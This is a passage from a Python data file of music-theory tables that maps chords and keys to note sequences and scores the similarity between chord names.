'GMinor': [ [ ['G', 'A', 'As'], ['As', 'C', 'D'], ['D', 'Ds', 'F', 'G'] ], [ ['G', 'F', 'Ds', 'D'], ['As', 'A', 'G'], ['D', 'C', 'As'] ] ],
},
'As7': {
'DMinor': [ [ ['As', 'C', 'D'], ['D', 'E', 'F'], ['F', 'G', 'A', 'As'] ], [ ['As', 'A', 'G', 'F'], ['D', 'C', 'As'], ['F', 'E', 'D'] ] ],
'FMajor': [ [ ['As', 'C', 'D'], ['D', 'E', 'F'], ['F', 'G', 'A', 'As'] ], [ ['As', 'A', 'G', 'F'], ['D', 'C', 'As'], ['F', 'E', 'D'] ] ],
'CMinor': [ [ ['As', 'C', 'D'], ['D', 'Ds', 'F'], ['F', 'G', 'Gs', 'As'] ], [ ['As', 'Gs', 'G', 'F'], ['D', 'C', 'As'], ['F', 'Ds', 'D'] ] ],
'DsMajor': [ [ ['As', 'C', 'D'], ['D', 'Ds', 'F'], ['F', 'G', 'Gs', 'As'] ], [ ['As', 'Gs', 'G', 'F'], ['D', 'C', 'As'], ['F', 'Ds', 'D'] ] ],
'AsMajor': [ [ ['As', 'C', 'D'], ['D', 'Ds', 'F'], ['F', 'G', 'A', 'As'] ], [ ['As', 'A', 'G', 'F'], ['D', 'C', 'As'], ['F', 'Ds', 'D'] ] ],
'GMinor': [ [ ['As', 'C', 'D'], ['D', 'Ds', 'F'], ['F', 'G', 'A', 'As'] ], [ ['As', 'A', 'G', 'F'], ['D', 'C', 'As'], ['F', 'Ds', 'D'] ] ],
},
'Gsm7': {
'CsMinor': [ [ ['Gs', 'A', 'B'], ['B', 'Cs', 'Ds'], ['Ds', 'E', 'Fs', 'Gs'] ], [ ['Gs', 'Fs', 'E', 'Ds'], ['B', 'A', 'Gs'], ['Ds', 'Cs', 'B'] ] ],
'GsMinor': [ [ ['Gs', 'As', 'B'], ['B', 'Cs', 'Ds'], ['Ds', 'E', 'Fs', 'Gs'] ], [ ['Gs', 'Fs', 'E', 'Ds'], ['B', 'As', 'Gs'], ['Ds', 'Cs', 'B'] ] ],
'BMajor': [ [ ['Gs', 'As', 'B'], ['B', 'Cs', 'Ds'], ['Ds', 'E', 'Fs', 'Gs'] ], [ ['Gs', 'Fs', 'E', 'Ds'], ['B', 'As', 'Gs'], ['Ds', 'Cs', 'B'] ] ],
'DsMinor': [ [ ['Gs', 'As', 'B'], ['B', 'Cs', 'Ds'], ['Ds', 'F', 'Fs', 'Gs'] ], [ ['Gs', 'Fs', 'F', 'Ds'], ['B', 'As', 'Gs'], ['Ds', 'Cs', 'B'] ] ],
'EMajor': [ [ ['Gs', 'A', 'B'], ['B', 'Cs', 'Ds'], ['Ds', 'E', 'Fs', 'Gs'] ], [ ['Gs', 'Fs', 'E', 'Ds'], ['B', 'A', 'Gs'], ['Ds', 'Cs', 'B'] ] ],
'CHMinor': [ [ ['Gs', 'B', 'C'], ['B', 'C', 'D'], ['Ds', 'F', 'G', 'Gs'] ], [ ['Gs', 'G', 'F', 'Ds'], ['B', 'Gs', 'G'], ['Ds', 'D', 'C'] ] ],
'FsMajor': [ [ ['Gs', 'As', 'B'], ['B', 'Cs', 'Ds'], ['Ds', 'F', 'Fs', 'Gs'] ], [ ['Gs', 'Fs', 'F', 'Ds'], ['B', 'As', 'Gs'], ['Ds', 'Cs', 'B'] ] ],
},
'EMaj7': {
'CsMinor': [ [ ['E', 'Fs', 'Gs'], ['Gs', 'A', 'B'], ['B', 'Cs', 'Ds', 'E'] ], [ ['E', 'Ds', 'Cs', 'B'], ['Gs', 'Fs', 'E'], ['B', 'A', 'Gs'] ] ],
'FsMinor': [ [ ['E', 'Fs', 'Gs'], ['Gs', 'A', 'B'], ['B', 'Cs', 'D', 'E'] ], [ ['E', 'D', 'Cs', 'B'], ['Gs', 'Fs', 'E'], ['B', 'A', 'Gs'] ] ],
'GsMinor': [ [ ['E', 'Fs', 'Gs'], ['Gs', 'As', 'B'], ['B', 'Cs', 'Ds', 'E'] ], [ ['E', 'Ds', 'Cs', 'B'], ['Gs', 'Fs', 'E'], ['B', 'As', 'Gs'] ] ],
'BMajor': [ [ ['E', 'Fs', 'Gs'], ['Gs', 'As', 'B'], ['B', 'Cs', 'Ds', 'E'] ], [ ['E', 'Ds', 'Cs', 'B'], ['Gs', 'Fs', 'E'], ['B', 'As', 'Gs'] ] ],
'AMajor': [ [ ['E', 'Fs', 'Gs'], ['Gs', 'A', 'B'], ['B', 'Cs', 'D', 'E'] ], [ ['E', 'D', 'Cs', 'B'], ['Gs', 'Fs', 'E'], ['B', 'A', 'Gs'] ] ],
'EMajor': [ [ ['E', 'Fs', 'Gs'], ['Gs', 'A', 'B'], ['B', 'Cs', 'Ds', 'E'] ], [ ['E', 'Ds', 'Cs', 'B'], ['Gs', 'Fs', 'E'], ['B', 'A', 'Gs'] ] ],
},
'FsMaj7': {
'CsMajor': [ [ ['Fs', 'Gs', 'As'], ['As', 'C', 'Cs'], ['Cs', 'Ds', 'F', 'Fs'] ], [ ['Fs', 'F', 'Ds', 'Cs'], ['As', 'Gs', 'Fs'], ['Cs', 'C', 'As'] ] ],
'GsMinor': [ [ ['Fs', 'Gs', 'As'], ['As', 'B', 'Cs'], ['Cs', 'Ds', 'E', 'Fs'] ], [ ['Fs', 'E', 'Ds', 'Cs'], ['As', 'Gs', 'Fs'], ['Cs', 'B', 'As'] ] ],
'BMajor': [ [ ['Fs', 'Gs', 'As'], ['As', 'B', 'Cs'], ['Cs', 'Ds', 'E', 'Fs'] ], [ ['Fs', 'E', 'Ds', 'Cs'], ['As', 'Gs', 'Fs'], ['Cs', 'B', 'As'] ] ],
'AsMinor': [ [ ['Fs', 'Gs', 'As'], ['As', 'C', 'Cs'], ['Cs', 'Ds', 'F', 'Fs'] ], [ ['Fs', 'F', 'Ds', 'Cs'], ['As', 'Gs', 'Fs'], ['Cs', 'C', 'As'] ] ],
'DsMinor': [ [ ['Fs', 'Gs', 'As'], ['As', 'B', 'Cs'], ['Cs', 'Ds', 'F', 'Fs'] ], [ ['Fs', 'F', 'Ds', 'Cs'], ['As', 'Gs', 'Fs'], ['Cs', 'B', 'As'] ] ],
'FsMajor': [ [ ['Fs', 'Gs', 'As'], ['As', 'B', 'Cs'], ['Cs', 'Ds', 'F', 'Fs'] ], [ ['Fs', 'F', 'Ds', 'Cs'], ['As', 'Gs', 'Fs'], ['Cs', 'B', 'As'] ] ],
},
'B7': {
'CsMinor': [ [ ['B', 'Cs', 'Ds'], ['Ds', 'E', 'Fs'], ['Fs', 'Gs', 'A', 'B'] ], [ ['B', 'A', 'Gs', 'Fs'], ['Ds', 'Cs', 'B'], ['Fs', 'E', 'Ds'] ] ],
'GsMinor': [ [ ['B', 'Cs', 'Ds'], ['Ds', 'E', 'Fs'], ['Fs', 'Gs', 'As', 'B'] ], [ ['B', 'As', 'Gs', 'Fs'], ['Ds', 'Cs', 'B'], ['Fs', 'E', 'Ds'] ] ],
'BMajor': [ [ ['B', 'Cs', 'Ds'], ['Ds', 'E', 'Fs'], ['Fs', 'Gs', 'As', 'B'] ], [ ['B', 'As', 'Gs', 'Fs'], ['Ds', 'Cs', 'B'], ['Fs', 'E', 'Ds'] ] ],
'DsMinor': [ [ ['B', 'Cs', 'Ds'], ['Ds', 'F', 'Fs'], ['Fs', 'Gs', 'As', 'B'] ], [ ['B', 'As', 'Gs', 'Fs'], ['Ds', 'Cs', 'B'], ['Fs', 'F', 'Ds'] ] ],
'EMajor': [ [ ['B', 'Cs', 'Ds'], ['Ds', 'E', 'Fs'], ['Fs', 'Gs', 'A', 'B'] ], [ ['B', 'A', 'Gs', 'Fs'], ['Ds', 'Cs', 'B'], ['Fs', 'E', 'Ds'] ] ],
'FsMajor': [ [ ['B', 'Cs', 'Ds'], ['Ds', 'F', 'Fs'], ['Fs', 'Gs', 'As', 'B'] ], [ ['B', 'As', 'Gs', 'Fs'], ['Ds', 'Cs', 'B'], ['Fs', 'F', 'Ds'] ] ],
},
'Bm7': {
'BMinor': [ [ ['B', 'Cs', 'D'], ['D', 'E', 'Fs'], ['Fs', 'G', 'A', 'B'] ], [ ['B', 'A', 'G', 'Fs'], ['D', 'Cs', 'B'], ['Fs', 'E', 'D'] ] ],
'FsMinor': [ [ ['B', 'Cs', 'D'], ['D', 'E', 'Fs'], ['Fs', 'Gs', 'A', 'B'] ], [ ['B', 'A', 'Gs', 'Fs'], ['D', 'Cs', 'B'], ['Fs', 'E', 'D'] ] ],
'GMajor': [ [ ['B', 'C', 'D'], ['D', 'E', 'Fs'], ['Fs', 'G', 'A', 'B'] ], [ ['B', 'A', 'G', 'Fs'], ['D', 'C', 'B'], ['Fs', 'E', 'D'] ] ],
'EMinor': [ [ ['B', 'C', 'D'], ['D', 'E', 'Fs'], ['Fs', 'G', 'A', 'B'] ], [ ['B', 'A', 'G', 'Fs'], ['D', 'C', 'B'], ['Fs', 'E', 'D'] ] ],
'AMajor': [ [ ['B', 'Cs', 'D'], ['D', 'E', 'Fs'], ['Fs', 'Gs', 'A', 'B'] ], [ ['B', 'A', 'Gs', 'Fs'], ['D', 'Cs', 'B'], ['Fs', 'E', 'D'] ] ],
'DMajor': [ [ ['B', 'Cs', 'D'], ['D', 'E', 'Fs'], ['Fs', 'G', 'A', 'B'] ], [ ['B', 'A', 'G', 'Fs'], ['D', 'Cs', 'B'], ['Fs', 'E', 'D'] ] ],
},
'AsMaj7': {
'DMinor': [ [ ['As', 'C', 'D'], ['D', 'E', 'F'], ['F', 'G', 'A', 'As'] ], [ ['As', 'A', 'G', 'F'], ['D', 'C', 'As'], ['F', 'E', 'D'] ] ],
'FMajor': [ [ ['As', 'C', 'D'], ['D', 'E', 'F'], ['F', 'G', 'A', 'As'] ], [ ['As', 'A', 'G', 'F'], ['D', 'C', 'As'], ['F', 'E', 'D'] ] ],
'CMinor': [ [ ['As', 'C', 'D'], ['D', 'Ds', 'F'], ['F', 'G', 'Gs', 'As'] ], [ ['As', 'Gs', 'G', 'F'], ['D', 'C', 'As'], ['F', 'Ds', 'D'] ] ],
'DsMajor': [ [ ['As', 'C', 'D'], ['D', 'Ds', 'F'], ['F', 'G', 'Gs', 'As'] ], [ ['As', 'Gs', 'G', 'F'], ['D', 'C', 'As'], ['F', 'Ds', 'D'] ] ],
'AsMajor': [ [ ['As', 'C', 'D'], ['D', 'Ds', 'F'], ['F', 'G', 'A', 'As'] ], [ ['As', 'A', 'G', 'F'], ['D', 'C', 'As'], ['F', 'Ds', 'D'] ] ],
'GMinor': [ [ ['As', 'C', 'D'], ['D', 'Ds', 'F'], ['F', 'G', 'A', 'As'] ], [ ['As', 'A', 'G', 'F'], ['D', 'C', 'As'], ['F', 'Ds', 'D'] ] ],
},
'D7': {
'BMinor': [ [ ['D', 'E', 'Fs'], ['Fs', 'G', 'A'], ['A', 'B', 'Cs', 'D'] ], [ ['D', 'Cs', 'B', 'A'], ['Fs', 'E', 'D'], ['A', 'G', 'Fs'] ] ],
'FsMinor': [ [ ['D', 'E', 'Fs'], ['Fs', 'Gs', 'A'], ['A', 'B', 'Cs', 'D'] ], [ ['D', 'Cs', 'B', 'A'], ['Fs', 'E', 'D'], ['A', 'Gs', 'Fs'] ] ],
'GMajor': [ [ ['D', 'E', 'Fs'], ['Fs', 'G', 'A'], ['A', 'B', 'C', 'D'] ], [ ['D', 'C', 'B', 'A'], ['Fs', 'E', 'D'], ['A', 'G', 'Fs'] ] ],
'EMinor': [ [ ['D', 'E', 'Fs'], ['Fs', 'G', 'A'], ['A', 'B', 'C', 'D'] ], [ ['D', 'C', 'B', 'A'], ['Fs', 'E', 'D'], ['A', 'G', 'Fs'] ] ],
'AMajor': [ [ ['D', 'E', 'Fs'], ['Fs', 'Gs', 'A'], ['A', 'B', 'Cs', 'D'] ], [ ['D', 'Cs', 'B', 'A'], ['Fs', 'E', 'D'], ['A', 'Gs', 'Fs'] ] ],
'DMajor': [ [ ['D', 'E', 'Fs'], ['Fs', 'G', 'A'], ['A', 'B', 'Cs', 'D'] ], [ ['D', 'Cs', 'B', 'A'], ['Fs', 'E', 'D'], ['A', 'G', 'Fs'] ] ],
},
'AMinor': {
'CMajor': [ [ ['A', 'B', 'C'], ['C', 'D', 'E'], ['E', 'F', 'G', 'A'] ], [ ['A', 'G', 'F', 'E'], ['C', 'B', 'A'], ['E', 'D', 'C'] ] ],
'GMajor': [ [ ['A', 'B', 'C'], ['C', 'D', 'E'], ['E', 'Fs', 'G', 'A'] ], [ ['A', 'G', 'Fs', 'E'], ['C', 'B', 'A'], ['E', 'D', 'C'] ] ],
'EMinor': [ [ ['A', 'B', 'C'], ['C', 'D', 'E'], ['E', 'Fs', 'G', 'A'] ], [ ['A', 'G', 'Fs', 'E'], ['C', 'B', 'A'], ['E', 'D', 'C'] ] ],
'DMinor': [ [ ['A', 'As', 'C'], ['C', 'D', 'E'], ['E', 'F', 'G', 'A'] ], [ ['A', 'G', 'F', 'E'], ['C', 'As', 'A'], ['E', 'D', 'C'] ] ],
'FMajor': [ [ ['A', 'As', 'C'], ['C', 'D', 'E'], ['E', 'F', 'G', 'A'] ], [ ['A', 'G', 'F', 'E'], ['C', 'As', 'A'], ['E', 'D', 'C'] ] ],
'AMinor': [ [ ['A', 'B', 'C'], ['C', 'D', 'E'], ['E', 'F', 'G', 'A'] ], [ ['A', 'G', 'F', 'E'], ['C', 'B', 'A'], ['E', 'D', 'C'] ] ],
},
'Am7': {
'CMajor': [ [ ['A', 'B', 'C'], ['C', 'D', 'E'], ['E', 'F', 'G', 'A'] ], [ ['A', 'G', 'F', 'E'], ['C', 'B', 'A'], ['E', 'D', 'C'] ] ],
'GMajor': [ [ ['A', 'B', 'C'], ['C', 'D', 'E'], ['E', 'Fs', 'G', 'A'] ], [ ['A', 'G', 'Fs', 'E'], ['C', 'B', 'A'], ['E', 'D', 'C'] ] ],
'EMinor': [ [ ['A', 'B', 'C'], ['C', 'D', 'E'], ['E', 'Fs', 'G', 'A'] ], [ ['A', 'G', 'Fs', 'E'], ['C', 'B', 'A'], ['E', 'D', 'C'] ] ],
'DMinor': [ [ ['A', 'As', 'C'], ['C', 'D', 'E'], ['E', 'F', 'G', 'A'] ], [ ['A', 'G', 'F', 'E'], ['C', 'As', 'A'], ['E', 'D', 'C'] ] ],
'FMajor': [ [ ['A', 'As', 'C'], ['C', 'D', 'E'], ['E', 'F', 'G', 'A'] ], [ ['A', 'G', 'F', 'E'], ['C', 'As', 'A'], ['E', 'D', 'C'] ] ],
'AMinor': [ [ ['A', 'B', 'C'], ['C', 'D', 'E'], ['E', 'F', 'G', 'A'] ], [ ['A', 'G', 'F', 'E'], ['C', 'B', 'A'], ['E', 'D', 'C'] ] ],
},
'FsMajor': {
'CsMajor': [ [ ['Fs', 'Gs', 'As'], ['As', 'C', 'Cs'], ['Cs', 'Ds', 'F', 'Fs'] ], [ ['Fs', 'F', 'Ds', 'Cs'], ['As', 'Gs', 'Fs'], ['Cs', 'C', 'As'] ] ],
'GsMinor': [ [ ['Fs', 'Gs', 'As'], ['As', 'B', 'Cs'], ['Cs', 'Ds', 'E', 'Fs'] ], [ ['Fs', 'E', 'Ds', 'Cs'], ['As', 'Gs', 'Fs'], ['Cs', 'B', 'As'] ] ],
'BMajor': [ [ ['Fs', 'Gs', 'As'], ['As', 'B', 'Cs'], ['Cs', 'Ds', 'E', 'Fs'] ], [ ['Fs', 'E', 'Ds', 'Cs'], ['As', 'Gs', 'Fs'], ['Cs', 'B', 'As'] ] ],
'AsMinor': [ [ ['Fs', 'Gs', 'As'], ['As', 'C', 'Cs'], ['Cs', 'Ds', 'F', 'Fs'] ], [ ['Fs', 'F', 'Ds', 'Cs'], ['As', 'Gs', 'Fs'], ['Cs', 'C', 'As'] ] ],
'DsMinor': [ [ ['Fs', 'Gs', 'As'], ['As', 'B', 'Cs'], ['Cs', 'Ds', 'F', 'Fs'] ], [ ['Fs', 'F', 'Ds', 'Cs'], ['As', 'Gs', 'Fs'], ['Cs', 'B', 'As'] ] ],
'FsMajor': [ [ ['Fs', 'Gs', 'As'], ['As', 'B', 'Cs'], ['Cs', 'Ds', 'F', 'Fs'] ], [ ['Fs', 'F', 'Ds', 'Cs'], ['As', 'Gs', 'Fs'], ['Cs', 'B', 'As'] ] ],
},
}
ChordSimilarity = {
'AMinor': {
'AMinor': 3,
'CDim': 1,
'Gs7': 1,
'GMaj7': 0,
'GsDim': 0,
'GsMajor': 1,
'Fs7': 1,
'CMajor': 2,
'Em7': 1,
'Dsm7': 0,
'Gsm7': 0,
'DMaj7': 1,
'Dm7': 2,
'Cm7': 1,
'CsMinor': 1,
'FsMinor': 1,
'DsMaj7': 0,
'BMaj7': 0,
'GMajor': 0,
'EMinor': 1,
'CsMaj7': 1,
'FDim': 0,
'DMinor': 1,
'FMajor': 2,
'ADim': 2,
'CMinor': 1,
'EDim': 1,
'B7': 1,
'AMajor': 2,
'A7': 2,
'Fm7': 1,
'DsMajor': 0,
'E7': 1,
'C7': 2,
'GsMinor': 0,
'Bm7': 1,
'G7': 0,
'Asm7': 0,
'BMajor': 0,
'Ds7': 0,
'GsMaj7': 1,
'AsMinor': 0,
'BDim': 0,
'AsMajor': 0,
'AMaj7': 2,
'DMajor': 1,
'AsDim': 1,
'Fsm7': 2,
'Cs7': 0,
'Gm7': 0,
'DDim': 0,
'CsMajor': 0,
'FMinor': 1,
'EMajor': 1,
'As7': 0,
'F7': 2,
'FMaj7': 3,
'FsDim': 2,
'GDim': 0,
'GMinor': 0,
'CsDim': 1,
'DsDim': 1,
'EMaj7': 1,
'FsMaj7': 0,
'BMinor': 0,
'CMaj7': 2,
'AsMaj7': 1,
'D7': 2,
'Csm7': 1,
'FsMajor': 0,
'Am7': 3,
'DsMinor': 0,
},
'CDim': {
'AMinor': 1,
'CDim': 3,
'Gs7': 3,
'GMaj7': 1,
'GsDim': 0,
'GsMajor': 2,
'Fs7': 1,
'CMajor': 1,
'Em7': 0,
'Dsm7': 2,
'Gsm7': 2,
'DMaj7': 1,
'Dm7': 1,
'Cm7': 2,
'CsMinor': 0,
'FsMinor': 1,
'DsMaj7': 1,
'BMaj7': 2,
'GMajor': 0,
'EMinor': 0,
'CsMaj7': 1,
'FDim': 0,
'DMinor': 0,
'FMajor': 1,
'ADim': 2,
'CMinor': 2,
'EDim': 0,
'B7': 2,
'AMajor': 0,
'A7': 0,
'Fm7': 2,
'DsMajor': 1,
'E7': 0,
'C7': 1,
'GsMinor': 1,
'Bm7': 1,
'G7': 0,
'Asm7': 0,
'BMajor': 2,
'Ds7': 1,
'GsMaj7': 2,
'AsMinor': 0,
'BDim': 0,
'AsMajor': 0,
'AMaj7': 0,
'DMajor': 1,
'AsDim': 0,
'Fsm7': 1,
'Cs7': 0,
'Gm7': 0,
'DDim': 0,
'CsMajor': 0,
'FMinor': 1,
'EMajor': 0,
'As7': 0,
'F7': 2,
'FMaj7': 1,
'FsDim': 2,
'GDim': 0,
'GMinor': 0,
'CsDim': 0,
'DsDim': 2,
'EMaj7': 1,
'FsMaj7': 1,
'BMinor': 1,
'CMaj7': 1,
'AsMaj7': 0,
'D7': 2,
'Csm7': 0,
'FsMajor': 1,
'Am7': 1,
'DsMinor': 2,
},
'Gs7': {
'AMinor': 1,
'CDim': 3,
'Gs7': 4,
'GMaj7': 1,
'GsDim': 1,
'GsMajor': 3,
'Fs7': 1,
'CMajor': 1,
'Em7': 0,
'Dsm7': 2,
'Gsm7': 3,
'DMaj7': 1,
'Dm7': 1,
'Cm7': 2,
'CsMinor': 1,
'FsMinor': 1,
'DsMaj7': 1,
'BMaj7': 2,
'GMajor': 0,
'EMinor': 0,
'CsMaj7': 2,
'FDim': 1,
'DMinor': 0,
'FMajor': 1,
'ADim': 2,
'CMinor': 2,
'EDim': 0,
'B7': 2,
'AMajor': 0,
'A7': 0,
'Fm7': 3,
'DsMajor': 1,
'E7': 1,
'C7': 1,
'GsMinor': 2,
'Bm7': 1,
'G7': 0,
'Asm7': 1,
'BMajor': 2,
'Ds7': 1,
'GsMaj7': 3,
'AsMinor': 0,
'BDim': 0,
'AsMajor': 0,
'AMaj7': 1,
'DMajor': 1,
'AsDim': 0,
'Fsm7': 1,
'Cs7': 1,
'Gm7': 0,
'DDim': 1,
'CsMajor': 1,
'FMinor': 2,
'EMajor': 1,
'As7': 1,
'F7': 2,
'FMaj7': 1,
'FsDim': 2,
'GDim': 0,
'GMinor': 0,
'CsDim': 0,
'DsDim': 2,
'EMaj7': 2,
'FsMaj7': 1,
'BMinor': 1,
'CMaj7': 1,
'AsMaj7': 0,
'D7': 2,
'Csm7': 1,
'FsMajor': 1,
'Am7': 1,
'DsMinor': 2,
},
'GMaj7': {
'AMinor': 0,
'CDim': 1,
'Gs7': 1,
'GMaj7': 4,
'GsDim': 2,
'GsMajor': 0,
'Fs7': 1,
'CMajor': 1,
'Em7': 3,
'Dsm7': 1,
'Gsm7': 2,
'DMaj7': 2,
'Dm7': 1,
'Cm7': 1,
'CsMinor': 0,
'FsMinor': 1,
'DsMaj7': 2,
'BMaj7': 2,
'GMajor': 3,
'EMinor': 2,
'CsMaj7': 0,
'FDim': 1,
'DMinor': 1,
'FMajor': 0,
'ADim': 0,
'CMinor': 1,
'EDim': 1,
'B7': 2,
'AMajor': 0,
'A7': 1,
'Fm7': 0,
'DsMajor': 1,
'E7': 2,
'C7': 1,
'GsMinor': 1,
'Bm7': 3,
'G7': 3,
'Asm7': 0,
'BMajor': 2,
'Ds7': 1,
'GsMaj7': 1,
'AsMinor': 0,
'BDim': 2,
'AsMajor': 1,
'AMaj7': 0,
'DMajor': 2,
'AsDim': 0,
'Fsm7': 1,
'Cs7': 1,
'Gm7': 2,
'DDim': 1,
'CsMajor': 0,
'FMinor': 0,
'EMajor': 1,
'As7': 1,
'F7': 0,
'FMaj7': 0,
'FsDim': 1,
'GDim': 1,
'GMinor': 2,
'CsDim': 1,
'DsDim': 1,
'EMaj7': 1,
'FsMaj7': 1,
'BMinor': 3,
'CMaj7': 2,
'AsMaj7': 1,
'D7': 2,
'Csm7': 1,
'FsMajor': 1,
'Am7': 1,
'DsMinor': 1,
},
'GsDim': {
'AMinor': 0,
'CDim': 0,
'Gs7': 1,
'GMaj7': 2,
'GsDim': 3,
'GsMajor': 1,
'Fs7': 0,
'CMajor': 0,
'Em7': 2,
'Dsm7': 0,
'Gsm7': 2,
'DMaj7': 1,
'Dm7': 1,
'Cm7': 0,
'CsMinor': 1,
'FsMinor': 0,
'DsMaj7': 1,
'BMaj7': 1,
'GMajor': 2,
'EMinor': 1,
'CsMaj7': 1,
'FDim': 2,
'DMinor': 1,
'FMajor': 0,
'ADim': 0,
'CMinor': 0,
'EDim': 0,
'B7': 1,
'AMajor': 0,
'A7': 0,
'Fm7': 1,
'DsMajor': 0,
'E7': 3,
'C7': 0,
'GsMinor': 2,
'Bm7': 2,
'G7': 2,
'Asm7': 1,
'BMajor': 1,
'Ds7': 0,
'GsMaj7': 1,
'AsMinor': 0,
'BDim': 2,
'AsMajor': 1,
'AMaj7': 1,
'DMajor': 1,
'AsDim': 0,
'Fsm7': 0,
'Cs7': 2,
'Gm7': 1,
'DDim': 2,
'CsMajor': 1,
'FMinor': 1,
'EMajor': 2,
'As7': 2,
'F7': 0,
'FMaj7': 0,
'FsDim': 0,
'GDim': 0,
'GMinor': 1,
'CsDim': 0,
'DsDim': 0,
'EMaj7': 2,
'FsMaj7': 0,
'BMinor': 2,
'CMaj7': 1,
'AsMaj7': 1,
'D7': 1,
'Csm7': 2,
'FsMajor': 0,
'Am7': 0,
'DsMinor': 0,
},
'GsMajor': {
'AMinor': 1,
'CDim': 2,
'Gs7': 3,
'GMaj7': 0,
'GsDim': 1,
'GsMajor': 3,
'Fs7': 0,
'CMajor': 1,
'Em7': 0,
'Dsm7': 1,
'Gsm7': 2,
'DMaj7': 0,
'Dm7': 1,
'Cm7': 2,
'CsMinor': 1,
'FsMinor': 0,
'DsMaj7': 1,
'BMaj7': 1,
'GMajor': 0,
'EMinor': 0,
'CsMaj7': 2,
'FDim': 1,
'DMinor': 0,
'FMajor': 1,
'ADim': 2,
'CMinor': 2,
'EDim': 0,
'B7': 1,
'AMajor': 0,
'A7': 0,
'Fm7': 3,
'DsMajor': 1,
'E7': 1,
'C7': 1,
'GsMinor': 2,
'Bm7': 0,
'G7': 0,
'Asm7': 1,
'BMajor': 1,
'Ds7': 1,
'GsMaj7': 3,
'AsMinor': 0,
'BDim': 0,
'AsMajor': 0,
'AMaj7': 1,
'DMajor': 0,
'AsDim': 0,
'Fsm7': 0,
'Cs7': 1,
'Gm7': 0,
'DDim': 1,
'CsMajor': 1,
'FMinor': 2,
'EMajor': 1,
'As7': 1,
'F7': 2,
'FMaj7': 1,
'FsDim': 1,
'GDim': 0,
'GMinor': 0,
'CsDim': 0,
'DsDim': 1,
'EMaj7': 2,
'FsMaj7': 0,
'BMinor': 0,
'CMaj7': 1,
'AsMaj7': 0,
'D7': 1,
'Csm7': 1,
'FsMajor': 0,
'Am7': 1,
'DsMinor': 1,
},
'Fs7': {
'AMinor': 1,
'CDim': 1,
'Gs7': 1,
'GMaj7': 1,
'GsDim': 0,
'GsMajor': 0,
'Fs7': 4,
'CMajor': 1,
'Em7': 1,
'Dsm7': 3,
'Gsm7': 1,
'DMaj7': 2,
'Dm7': 0,
'Cm7': 1,
'CsMinor': 2,
'FsMinor': 2,
'DsMaj7': 1,
'BMaj7': 2,
'GMajor': 0,
'EMinor': 1,
'CsMaj7': 1,
'FDim': 0,
'DMinor': 0,
'FMajor': 0,
'ADim': 0,
'CMinor': 0,
'EDim': 2,
'B7': 1,
'AMajor': 2,
'A7': 2,
'Fm7': 0,
'DsMajor': 1,
'E7': 1,
'C7': 2,
'GsMinor': 0,
'Bm7': 1,
'G7': 0,
'Asm7': 2,
'BMajor': 1,
'Ds7': 2,
'GsMaj7': 0,
'AsMinor': 2,
'BDim': 0,
'AsMajor': 1,
'AMaj7': 2,
'DMajor': 1,
'AsDim': 3,
'Fsm7': 3,
'Cs7': 1,
'Gm7': 1,
'DDim': 0,
'CsMajor': 1,
'FMinor': 0,
'EMajor': 1,
'As7': 1,
'F7': 0,
'FMaj7': 1,
'FsDim': 1,
'GDim': 2,
'GMinor': 1,
'CsDim': 2,
'DsDim': 1,
'EMaj7': 1,
'FsMaj7': 3,
'BMinor': 1,
'CMaj7': 1,
'AsMaj7': 1,
'D7': 1,
'Csm7': 2,
'FsMajor': 3,
'Am7': 1,
'DsMinor': 2,
},
'CMajor': {
'AMinor': 2,
'CDim': 1,
'Gs7': 1,
'GMaj7': 1,
'GsDim': 0,
'GsMajor': 1,
'Fs7': 1,
'CMajor': 3,
'Em7': 2,
'Dsm7': 0,
'Gsm7': 0,
'DMaj7': 0,
'Dm7': 1,
'Cm7': 2,
'CsMinor': 1,
'FsMinor': 0,
'DsMaj7': 1,
'BMaj7': 0,
'GMajor': 1,
'EMinor': 2,
'CsMaj7': 1,
'FDim': 0,
'DMinor': 0,
'FMajor': 1,
'ADim': 1,
'CMinor': 2,
'EDim': 2,
'B7': 0,
'AMajor': 1,
'A7': 2,
'Fm7': 1,
'DsMajor': 1,
'E7': 1,
'C7': 3,
'GsMinor': 0,
'Bm7': 0,
'G7': 1,
'Asm7': 0,
'BMajor': 0,
'Ds7': 1,
'GsMaj7': 2,
'AsMinor': 0,
'BDim': 0,
'AsMajor': 0,
'AMaj7': 1,
'DMajor': 0,
'AsDim': 1,
'Fsm7': 1,
'Cs7': 0,
'Gm7': 1,
'DDim': 0,
'CsMajor': 0,
'FMinor': 1,
'EMajor': 1,
'As7': 0,
'F7': 1,
'FMaj7': 2,
'FsDim': 1,
'GDim': 1,
'GMinor': 1,
'CsDim': 2,
'DsDim': 0,
'EMaj7': 1,
'FsMaj7': 0,
'BMinor': 0,
'CMaj7': 3,
'AsMaj7': 0,
'D7': 1,
'Csm7': 1,
'FsMajor': 0,
'Am7': 3,
'DsMinor': 0,
},
'Em7': {
'AMinor': 1,
'CDim': 0,
'Gs7': 0,
'GMaj7': 3,
'GsDim': 2,
'GsMajor': 0,
'Fs7': 1,
'CMajor': 2,
'Em7': 4,
'Dsm7': 0,
'Gsm7': 1,
'DMaj7': 1,
'Dm7': 1,
'Cm7': 1,
'CsMinor': 1,
'FsMinor': 0,
'DsMaj7': 2,
'BMaj7': 1,
'GMajor': 3,
'EMinor': 3,
'CsMaj7': 0,
'FDim': 1,
'DMinor': 1,
'FMajor': 0,
'ADim': 0,
'CMinor': 1,
'EDim': 2,
'B7': 1,
'AMajor': 1,
'A7': 2,
'Fm7': 0,
'DsMajor': 1,
'E7': 3,
'C7': 2,
'GsMinor': 1,
'Bm7': 2,
'G7': 3,
'Asm7': 0,
'BMajor': 1,
'Ds7': 1,
'GsMaj7': 1,
'AsMinor': 0,
'BDim': 2,
'AsMajor': 1,
'AMaj7': 1,
'DMajor': 1,
'AsDim': 1,
'Fsm7': 1,
'Cs7': 1,
'Gm7': 2,
'DDim': 1,
'CsMajor': 0,
'FMinor': 0,
'EMajor': 2,
'As7': 1,
'F7': 0,
'FMaj7': 1,
'FsDim': 0,
'GDim': 1,
'GMinor': 2,
'CsDim': 2,
'DsDim': 0,
'EMaj7': 2,
'FsMaj7': 0,
'BMinor': 2,
'CMaj7': 3,
'AsMaj7': 1,
'D7': 1,
'Csm7': 2,
'FsMajor': 0,
'Am7': 2,
'DsMinor': 0,
},
'Dsm7': {
'AMinor': 0,
'CDim': 2,
'Gs7': 2,
'GMaj7': 1,
'GsDim': 0,
'GsMajor': 1,
'Fs7': 3,
'CMajor': 0,
'Em7': 0,
'Dsm7': 4,
'Gsm7': 2,
'DMaj7': 2,
'Dm7': 0,
'Cm7': 2,
'CsMinor': 1,
'FsMinor': 2,
